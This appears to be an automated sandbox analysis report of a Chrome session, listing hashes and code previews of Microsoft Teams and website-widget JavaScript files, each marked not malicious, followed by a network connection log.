                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[209929],{598166:(t,e,n)=>{"use strict";function r(t){return t.split("-")[1]}function i(t){return"y"===t?"height":"width"}function o(t){return t.split("-")[0]}function a(t){return["top","bottom"].includes(o(t))?"x":"y"}function s(t,e,n){let{reference:s,floating:l}=t;const c=s.x+s.width/2-l.width/2,f=s.y+s.height/2-l.height/2,u=a(e),d=i(u),p=s[d]/2-l[d]/2,h="x"===u;let g;switch(o(e)){case"top":g={x:c,y:s.y-l.height};break;case"bottom":g={x:c,y:s.y+s.height};break;case"right":g={x:s.x+s.width,y:f};break;case"left":g={x:s.x-l.width,y:f};break;default:g={x:s.x,y:s.y}}switch(r(e)){case"start":g[u]-=p*(n&&h?-1:1);break;case"end":g[u]+=p*(n&&h?-1:1)}return g}n.d(e,{UE:()=>g,rD:()=>l,__:()=>u,UU:()=>b,jD:()=>I,ER:()=>L,cY:()=>k,B1:()=>f,BN:()=>E,Ej:()=>B});const l=async(t,e,n)=>{const{placement:r="bottom",strategy:i="absolute",middleware:o=[],platform:a}=n,l=o.filter(Boolean),c=await(null==a.isRTL
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):308700
                                                                                                                                                                                                                          Entropy (8bit):5.404998924415669
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:PD2jvR4qOq5oiqbc2mV5DFzepcmuojhIiZMk5RnJRP:PD2jvR4qOq5oiqbc285DF8cmumhIiZp/
                                                                                                                                                                                                                          MD5:DACD89FC50E6474F44A8DE8D7B2BAA40
                                                                                                                                                                                                                          SHA1:211FC3DF4F70006451934E30C04F88D057672584
                                                                                                                                                                                                                          SHA-256:E2F76883458C57E612B2385D460E44E270AC1E49EEA1117989BA0FE360B869A6
                                                                                                                                                                                                                          SHA-512:354580B843BF4B319332D858706C63ADBFA0AD4E9ABC1F03961D9E3C1096E953EBC51C6B81D397E77F90AA4881994F898E7BB53BC4D10BB814BF26A60563F08D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/931067-540363234a7874ae.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[931067],{292051:(e,r,o)=>{o.d(r,{f:()=>a});var a=function(){return{attributes:{root:{role:"cell"}}}}},542814:(e,r,o)=>{o.d(r,{F:()=>n});var a=o(292051),t=function(){return{attributes:{root:{role:"columnheader"}}}},n=function(e){return{attributes:{root:{role:"row"}},childBehaviors:{cell:e.header?t:a.f}}}},453766:(e,r,o)=>{o.d(r,{J:()=>n});var a=o(888846),t=o(698099),n=function(){return{attributes:{root:{role:"toolbar"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:t.i}}}},698099:(e,r,o)=>{o.d(r,{i:()=>n});var a=o(953543),t=o(504405),n=function(e){var r;return{attributes:{wrapper:{role:"presentation"},root:(r={role:"button",tabIndex:0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-disabled":e.disabled,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-described
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5155)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5263
                                                                                                                                                                                                                          Entropy (8bit):5.151157042119288
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:ThGNjzj4jiRGi3wGNiU2BuPRELEYQncbQlyGJO/s4fFWVqXsJsLsGDs+1sarbHJS:9GNjzj4jiRGi3wGNi+PRELEYQcb9G6fc
                                                                                                                                                                                                                          MD5:FC497DFB2A08F21B1A7D8866B7638247
                                                                                                                                                                                                                          SHA1:8E1D63D4885BA36E77B9BF0E149E862830DF07BB
                                                                                                                                                                                                                          SHA-256:BBCEDE435B654241D9980D457BC579FB4949EF3CEA216FC87DBE87CDF99CEB20
                                                                                                                                                                                                                          SHA-512:CF04997AC8CD1E64F10013B04A20A4DC41B79FD90F00CBF5783A7802BF3DEBB8F726F83ADB65EA03E581F285121FC6A943D4FF932EA6EEB0DE036FDD6D854C99
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[711005,933386],{845155:e=>{e.exports=function(e,n,t,r,o,i,u,a){if(!e){var s;if(void 0===n)s=new Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var c=[t,r,o,i,u,a],v=0;(s=new Error(n.replace(/%s/g,(function(){return c[v++]})))).name="Invariant Violation"}throw s.framesToPop=1,s}}},711005:(e,n,t)=>{t.r(n),t.d(n,{NovaCentralizedCommandingProvider:()=>s,NovaEventingInterceptor:()=>y,NovaEventingProvider:()=>E,NovaGraphQLProvider:()=>R,graphql:()=>G,mapEventMetadata:()=>k,useFragment:()=>M,useLazyLoadQuery:()=>L,useMutation:()=>_,useNovaCentralizedCommanding:()=>c,useNovaEventing:()=>b,useNovaGraphQL:()=>z,useNovaUnmountEventing:()=>N,usePaginationFragment:()=>S,useRefetchableFragment:()=>F,useSubscription:()=>Q});var r=t(513432),o=t.n(r),i=t(845155),u=t.n(i),a=o().createContext(null),s=({
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (15497)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):15605
                                                                                                                                                                                                                          Entropy (8bit):5.468955649965476
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:iRd8EabA2j7TJISNhQjujjO0/Iu6pAbONOzBo:m8EablPNhhKWIu6pAb26o
                                                                                                                                                                                                                          MD5:0CF2320C179556FD02BCA7E4334F4C89
                                                                                                                                                                                                                          SHA1:967BA55ED9AF744BB82DDD432062B437645BEF0E
                                                                                                                                                                                                                          SHA-256:0EE917F8133E6C98FED6879B31C9AC36FED5BDD6BDE6BFA4EFE2ECFCC538B148
                                                                                                                                                                                                                          SHA-512:E16F8D6D543704AABBED9184EDF536C736099F22699888E548ABE5509D123B7110C3116706F16E52E7CB173A712FDC1B3D7D23336D9A696C5DF54DB5240D5662
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[221963,693593],{996411:(e,t,r)=>{"use strict";r.d(t,{A:()=>p});var n=r(749045),i=r(930591),o=r(207562),s=r(717798),a=r(151820),l=r(714907),u=function(e,t){return(0,i.VF)(function(e,t){var r=-1,n=44;do{switch((0,i.Sh)(n)){case 0:38===n&&12===(0,i.se)()&&(t[r]=1),e[r]+=(0,i.Cv)(i.G1-1);break;case 2:e[r]+=(0,i.Tb)(n);break;case 4:if(44===n){e[++r]=58===(0,i.se)()?"&\f":"",t[r]=e[r].length;break}default:e[r]+=(0,o.HT)(n)}}while(n=(0,i.K2)());return e}((0,i.c4)(e),t))},c=new WeakMap,d=function(e){if("rule"===e.type&&e.parent&&e.length){for(var t=e.value,r=e.parent,n=e.column===r.column&&e.line===r.line;"rule"!==r.type;)if(!(r=r.parent))return;if((1!==e.props.length||58===t.charCodeAt(0)||c.get(r))&&!n){c.set(e,!0);for(var i=[],o=u(t,i),s=r.props,a=0,l=0;a<o.length;a++)for(var d=0;d<s.length;d++,l++)e.props[l]=i[a]?o[a].replace(/&\f/g,s[d]):s[d]+" "+o[a]}}},f=function(e){if("decl"===e.type){var
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):326151
                                                                                                                                                                                                                          Entropy (8bit):5.071998687525131
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:Mt84atnFydxFqPyeKHQhgW1T2voThhkqTipRcnwZeC17ent:Y84atnFydxQPyZwXnvnt
                                                                                                                                                                                                                          MD5:F6381AB85F8A1415B6611E6B5B3216F9
                                                                                                                                                                                                                          SHA1:A98FFEF8FD054720D257DC676FBDF3D2D7B84471
                                                                                                                                                                                                                          SHA-256:C60AE71551DFECBA8CA8D7C7A05EC33B9F3C0EDD166F99A27C92CC0BC70156E2
                                                                                                                                                                                                                          SHA-512:EC2B5287A6EB1EDD52127DD49C4C976432CD8845669877D2C4C8DCF5C15894207769ED1AD0CF401113287F707A9187342A0082504A7A1782FF82441C086B324D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/runtime-2d557ec41254cae5.js
                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e,a,c,l,s,o,d,r,t,f,b,n,i,g,m,p={},h={};function u(e){var a=h[e];if(void 0!==a)return a.exports;var c=h[e]={id:e,loaded:!1,exports:{}};return p[e].call(c.exports,c,c.exports,u),h[e]&&u.ff&&delete p[e],c.loaded=!0,c.exports}u.m=p,u.c=h,u.ff=(()=>{try{return!JSON.parse(decodeURIComponent(document.head.getAttribute("data-config")))?.sidecars?.disableWebpackMemoryOptimization}catch{return!1}})(),u.amdO={},e="function"==typeof Symbol?Symbol("webpack then"):"__webpack_then__",a="function"==typeof Symbol?Symbol("webpack exports"):"__webpack_exports__",c=e=>{e&&(e.forEach((e=>e.r--)),e.forEach((e=>e.r--?e.r++:e())))},l=e=>! --e.r&&e(),s=(e,a)=>e?e.push(a):l(a),u.a=(o,d,r)=>{var t,f,b,n=r&&[],i=o.exports,g=!0,m=!1,p=(a,c,l)=>{m||(m=!0,c.r+=a.length,a.map(((a,s)=>a[e](c,l))),m=!1)},h=new Promise(((e,a)=>{b=a,f=()=>(e(i),c(n),n=0)}));h[a]=i,h[e]=(e,a)=>{if(g)return l(e);t&&p(t,e,a),s(n,e),h.catch(a)},o.exports=h,d((o=>{if(!o)return f();var d,r;t=(o=>o.map((o=>{if(null!==o&&
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (829)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):896
                                                                                                                                                                                                                          Entropy (8bit):5.2451476719266195
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:coBLoXaPXAH5NUXhz+HLZdHsq2DBWJSqhO0GHrIY1:v8XyXA/Uxz+rLHqVO6rIa
                                                                                                                                                                                                                          MD5:84D95B7A2C73DBCCE629E7A7CC1DD0B8
                                                                                                                                                                                                                          SHA1:B597F2E6E17792A9A415D445166CB20A4980A50D
                                                                                                                                                                                                                          SHA-256:BAEBB194CD33324576498D7F6872896ADEEDC3705793F647FFDB1937EDC53C37
                                                                                                                                                                                                                          SHA-512:497874AF3DC1342FB355D7DD218787E69A58B265D8867D4FA21F34DA4136EF45A72323C284300C33758F6C20A6CC998F222994B1C7E494846ADBB950A6E704E3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-_rollupPluginBabelHelpers-5804ec33.js",["exports"],(function(e){"use strict";function r(){return r=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var n=arguments[r];for(var t in n)({}).hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},r.apply(null,arguments)}e._=function(e,r,n){return(r=function(e){var r=function(e,r){if("object"!=typeof e||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var t=n.call(e,r||"default");if("object"!=typeof t)return t;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===r?String:Number)(e)}(e,"string");return"symbol"==typeof r?r:r+""}(r))in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e},e.a=r})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-_rollupPluginBabelHelpers-5804ec33.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1352)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1400
                                                                                                                                                                                                                          Entropy (8bit):5.307032039583678
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:c6BLQZSwXZSUcUxQAQId+06QyyU+bHJRWIFSPhXCoiCUPGyTiKNPR138IHrIYf:j+SwJSxAQ0H0OpwUSPhXCoiCUeuiKNPd
                                                                                                                                                                                                                          MD5:5CC6B93D41889C0A55C6C4FCD2D89713
                                                                                                                                                                                                                          SHA1:51A59C1DAE337817C4EBAC39FBE61C232705A893
                                                                                                                                                                                                                          SHA-256:8671CFDFA128168DB2136D7C17F55BA98DDBA221CDD1ACBBE559D4969280FD51
                                                                                                                                                                                                                          SHA-512:8BCAAB1399B6D4D7475C4CF1DC45B0477A9D2AD37578DFCCF23C0C9303716DA1DECD5FBA858D5DD609CB89BCC784E04B72A0D7136BC6EE60DC3EF69CAB977C33
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-index2-87bd33e6.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-index2-87bd33e6.js",["exports"],(function(t){"use strict";t.a=function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"medium";return{"> :nth-child(n)":{marginBottom:t}," > :last-child":{marginBottom:"0 !important"}}},t.b=function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"medium";return{"> :nth-child(n)":{marginRight:t}," > :last-child":{marginRight:"0 !important"}}},t.c=function(t){const e=function(t){if("string"!=typeof t||"{"!==t[0])return null;try{return JSON.parse(t)}catch(t){return null}}(t)||{};let n=0;return e.blocks&&e.blocks.forEach((t=>{const e=t.text.length;n+=(global._||guac.lodash).clamp(e,25,Math.max(e,25))})),n},t.g=()=>{const t=document.getElementsByClassName("ux-scaled");let e=1;return t&&t.length>0&&(e=t[0].getAttribute("data-scale")),e},t.r=t=>{let{count:e=0,fontSizeMap:n={},defaultFontSize:r}=t;const i=(global._||guac.lodash).reduce(n,((t,e,n)=>{let[r,i=Number.MAX_VALUE]=e;return t.push({range:[r,i],
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9340)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):9448
                                                                                                                                                                                                                          Entropy (8bit):4.523377967026933
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:eb1U2QgAsRxHbQsnU5SFHL4VG9TCE+gLAq:aJnUAhTL+gLAq
                                                                                                                                                                                                                          MD5:7C8D3065F041AC3BB96AD2BB1F69A97D
                                                                                                                                                                                                                          SHA1:90E10AB01E7ACA5F96C70479884CF6C9E96B932F
                                                                                                                                                                                                                          SHA-256:2A5643B209D4B26EBC41F5BF81AB5E43F8E492F2E812ACF4702874E72C831698
                                                                                                                                                                                                                          SHA-512:88C3A8887AAC6EF11F06B64014EEDEF161F216440B59CC21404D4DC6ED3248364038ADB233A294072D99522341524B5EB4598CD34E8E442057BECE4F9587C955
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/668172-b0568f91988739cd.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[668172],{668172:(a,l,Z)=>{Z.d(l,{ISY:()=>e,iFL:()=>h,FBb:()=>M,RIf:()=>m,p2G:()=>r,_PZ:()=>i,KDG:()=>v,a37:()=>A,NUc:()=>U,zPg:()=>V,hVM:()=>H,n1E:()=>d,umr:()=>u,E3C:()=>g,ao$:()=>t,nP9:()=>L,nat:()=>R,x3b:()=>C,Hee:()=>E,DRY:()=>F,G4r:()=>s,K$:()=>o,wvY:()=>n,Ppp:()=>_,tDd:()=>p,zDe:()=>f});var c=Z(693935);const e=(0,c.U)("Edit16Filled","16",["M10.53 1.76a2.62 2.62 0 1 1 3.7 3.71l-.77.78-3.71-3.7.78-.79ZM9.04 3.25 2.66 9.64c-.38.37-.64.84-.78 1.35l-.86 3.39a.5.5 0 0 0 .6.6l3.39-.86c.51-.14.98-.4 1.35-.78l6.39-6.38-3.7-3.71Z"]),h=(0,c.U)("Edit16Regular","16",["M14.24 1.76a2.62 2.62 0 0 0-3.71 0L2.66 9.64c-.38.37-.64.84-.78 1.35l-.86 3.39a.5.5 0 0 0 .6.6l3.39-.86c.51-.14.98-.4 1.35-.78l7.88-7.87a2.62 2.62 0 0 0 0-3.7Zm-3 .71a1.62 1.62 0 1 1 2.29 2.3l-.78.77-2.3-2.29.79-.78ZM9.75 3.96l2.3 2.29-6.4 6.39c-.24.24-.55.42-.89.5l-2.57.67.66-2.57c.09-.34.27-.65.51-.9l6.39-6.38Z"]),M=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1191)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1299
                                                                                                                                                                                                                          Entropy (8bit):5.243624236595786
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38TMvCam+7wybSqkIozwVDhytW67C7Q42Q/KTozNKSk/qRpat4vQi6yIkY1:wp3sp3eM3Rthu7yQ4okqqbaMQi6yIdln
                                                                                                                                                                                                                          MD5:C9F2D980F1163B95B19052E4A5CE0ABE
                                                                                                                                                                                                                          SHA1:B5EFC49E29265B2AB334F1DFDAA43D6593C189CC
                                                                                                                                                                                                                          SHA-256:ED681F88CD569BE8A4779582EA93900F349DB64DC6F34811A70A26A4314AF8CC
                                                                                                                                                                                                                          SHA-512:260BD1EC7DDB69468C8D21A7F8065110AF032759F966E7FA5BB07193BF9EDBBA6ECD606961831C543DEC4086E36E5FF35FA38DB7BEF624AFE58D4E92295720E9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/224316-24c285ed94067094.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[224316],{224316:(e,a,t)=>{t.d(a,{C:()=>r});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),i=t(829289),r=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svgFlippingInRtl},s.createElement("path",{className:n()(i.Q.outline,a.outlinePart),d:"M7.64582 4.14708C7.84073 3.95147 8.15731 3.9509 8.35292 4.14582L13.8374 9.6108C14.0531 9.82574 14.0531 10.1751 13.8374 10.39L8.35292 15.855C8.15731 16.0499 7.84073 16.0493 7.64582 15.8537C7.4509 15.6581 7.45147 15.3415 7.64708 15.1466L12.8117 10.0004L7.64708 4.85418C7.45147 4.65927 7.4509 4.34269 7.64582 4.14708Z"}),s.createElement("path",{className:n()(i.Q.filled,a.filledPart),d:"M7.73271 4.20694C8.03263 3.92125 8.50737 3.93279 8.79306 4.23271L13.7944 9.48318C14.0703 9.77285 14.0703 10.2281 13.7944 10.5178L8.79306 15.7682C8.50737 16.0681 8.03263 1
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (10500)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):10608
                                                                                                                                                                                                                          Entropy (8bit):5.449647970342551
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:0jCs08M7Ob5FYFV+B16k8BQb+4g0mcoEz9DOtrMIrD1:0jCkM7Ob5i7+B16k8WK4Z+A9DOtrMIrZ
                                                                                                                                                                                                                          MD5:86473D9A3F80D41C280BD1A6F79DCF2E
                                                                                                                                                                                                                          SHA1:93E56D4F26E2062AF2633010C9565AD6B4D1694E
                                                                                                                                                                                                                          SHA-256:575A0A5B47739B90AF0BD301C78E43013126B75A333FA30326BB8CC0F16327AA
                                                                                                                                                                                                                          SHA-512:F5461C83CC438B03DFDB20FD4F65F331F9F8410DBCE7700B87FED5D5F76A61BC69EE25B2385517BD76357BB8AA33DF7FA5C261526AB49E4ABCFF573B0E021511
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[309556],{306747:(e,n,t)=>{t.d(n,{W:()=>O});var o=t(513432),r=t(903561),u=t(910889),s=t(437932),a=t(411947),l=t(589256),i=t(602835),c=t(132915),p=t(585536),v=t(257495),d=t(953291),f=t(35871),m=t(553864),g=t(868976),k=t(719914),b=t(514795);const h=["after","after-bottom","before-top","before","before-bottom","above"],y=e=>{const[n,t]=(0,l.i)({state:e.checkedValues,defaultState:e.defaultCheckedValues,initialState:{}});return[n,(0,i.D)(((n,{name:o,checkedItems:r})=>{var u;null===(u=e.onCheckedValueChange)||void 0===u||u.call(e,n,{name:o,checkedItems:r}),t((e=>({...e,[o]:r})))}))]},C=e=>{const{targetDocument:n}=(0,f.useFluent_unstable)(),t=(0,g.tv)((e=>e.setOpen)),r=(0,i.D)(((n,t)=>{var o;return null===(o=e.onOpenChange)||void 0===o?void 0:o.call(e,n,t)})),u=o.useRef(!1),[s,a]=(0,l.i)({state:e.open,defaultState:e.defaultOpen,initialState:!1}),b=(0,i.D)(((n,o)=>{const u=n instanceo
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (829)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):896
                                                                                                                                                                                                                          Entropy (8bit):5.2451476719266195
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:coBLoXaPXAH5NUXhz+HLZdHsq2DBWJSqhO0GHrIY1:v8XyXA/Uxz+rLHqVO6rIa
                                                                                                                                                                                                                          MD5:84D95B7A2C73DBCCE629E7A7CC1DD0B8
                                                                                                                                                                                                                          SHA1:B597F2E6E17792A9A415D445166CB20A4980A50D
                                                                                                                                                                                                                          SHA-256:BAEBB194CD33324576498D7F6872896ADEEDC3705793F647FFDB1937EDC53C37
                                                                                                                                                                                                                          SHA-512:497874AF3DC1342FB355D7DD218787E69A58B265D8867D4FA21F34DA4136EF45A72323C284300C33758F6C20A6CC998F222994B1C7E494846ADBB950A6E704E3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-_rollupPluginBabelHelpers-5804ec33.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-_rollupPluginBabelHelpers-5804ec33.js",["exports"],(function(e){"use strict";function r(){return r=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var n=arguments[r];for(var t in n)({}).hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},r.apply(null,arguments)}e._=function(e,r,n){return(r=function(e){var r=function(e,r){if("object"!=typeof e||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var t=n.call(e,r||"default");if("object"!=typeof t)return t;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===r?String:Number)(e)}(e,"string");return"symbol"==typeof r?r:r+""}(r))in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e},e.a=r})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-_rollupPluginBabelHelpers-5804ec33.js.map.
                                                                                                                                                                                                                          No static file info
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.151808977 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152012110 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152070045 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152131081 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152401924 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152466059 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152719021 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152730942 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.152811050 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.160917044 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.161113977 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.161173105 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.168807983 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.169011116 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.169073105 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.176733017 CET4434969220.190.181.1192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:31.222616911 CET49692443192.168.2.1820.190.181.1
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.528101921 CET4970280192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.528934956 CET4970380192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.616252899 CET4970480192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.651513100 CET804970276.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.651597023 CET4970280192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.651803970 CET4970280192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.651978970 CET804970376.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.652040005 CET4970380192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.735961914 CET804970476.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.736037970 CET4970480192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:37.771388054 CET804970276.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.751660109 CET804970276.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.797878981 CET4970280192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.893028021 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.893057108 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.893157959 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.893434048 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:38.893445969 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.133203983 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.133514881 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.133528948 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.134740114 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.134826899 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.135823011 CET49706443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.135890961 CET4434970613.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:40.135993004 CET49706443192.168.2.1813.248.243.5
